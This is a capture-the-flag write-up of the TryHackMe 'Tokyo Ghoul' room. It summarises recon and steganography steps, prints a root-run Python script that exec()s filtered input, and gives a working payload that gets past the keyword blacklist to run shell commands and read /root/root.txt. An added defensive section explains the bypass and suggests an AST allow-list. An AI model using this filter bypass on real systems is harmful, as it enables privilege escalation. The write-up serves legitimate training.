TryHackMe | Tokyo Ghoul

nmap scan of all ports
banner scan for os version
FILE: Aogiri_tree.txt
Why are you so late?? i've been waiting for too long .
So i heard you need help to defeat Jason , so i'll help you to do it and i know you are wondering how i will.
I knew Rize San more than anyone and she is a part of you, right?
That mean you got her kagune , so you should activate her Kagune and to do that you should get all control to your body , i'll help you to know Rise san more and get her kagune , and don't forget you are now a part of the Aogiri tree .
Bye Kaneki.
strings need_to_talk
steghide extract
decoded caption
hidden directory
gobuster scan on directory
There is something vulnerable here
LFI maybe?
Error message

… I spent over a day stuck here!

After a few rabbit holes and a lot of for loops I finally figured it out

john and password
ssh to host
sudo -l
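#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    # Case-sensitive substring blacklist applied to the raw input
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return  # assumed: not in the listing as captured
    else:
        # assumed: not in the listing as captured; the input below only has an effect if the filtered text is executed
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()  # assumed: the call is missing from the listing as captured

input at the >>> prompt (the upper-case strings are lowered at runtime, so the keyword check never matches):
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')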
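Why the keyword check in the script above does not stop that input, as an added example (not part of the original write-up or the room's code): it compares the script's substring blacklist with a syntax-tree allow-list. The allow-list, the function names and the arithmetic-only policy are assumptions for illustration; the input string is only parsed, never executed.

```python
import ast

# Keyword list copied from the script on this page.
BLACKLIST = ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']

# Input shown on this page; it is only inspected here, never executed.
PAGE_INPUT = ("__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
              ".__dict__['SYSTEM'.lower()]('cat /root/root.txt')")

def substring_filter_allows(text):
    """The page's check: case-sensitive substring match on the raw text."""
    return not any(keyword in text for keyword in BLACKLIST)

# Hypothetical allow-list: the only syntax an arithmetic prompt needs.
ALLOWED_NODES = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
                 ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub)

def structural_filter_allows(text):
    """Allow-list on the parsed tree: names, attributes, subscripts and
    calls are rejected, however the strings inside them are spelled."""
    try:
        tree = ast.parse(text, mode='eval')
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            return False
        if isinstance(node, ast.Constant) and not isinstance(node.value, (int, float)):
            return False
    return True

def rejected_node_types(text):
    """Names of the node types the allow-list refuses (useful for logging)."""
    tree = ast.parse(text, mode='eval')
    return sorted({type(n).__name__ for n in ast.walk(tree)
                   if not isinstance(n, ALLOWED_NODES)})

if __name__ == "__main__":
    print("substring blacklist allows page input:", substring_filter_allows(PAGE_INPUT))
    print("structural allow-list allows page input:", structural_filter_allows(PAGE_INPUT))
    print("refused node types:", rejected_node_types(PAGE_INPUT))
    print("structural allow-list allows '2 * (3 + 4)':", structural_filter_allows("2 * (3 + 4)"))
```

For a script reachable through sudo, the stronger fix is to not pass user input to exec at all and to map input to a fixed set of actions.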



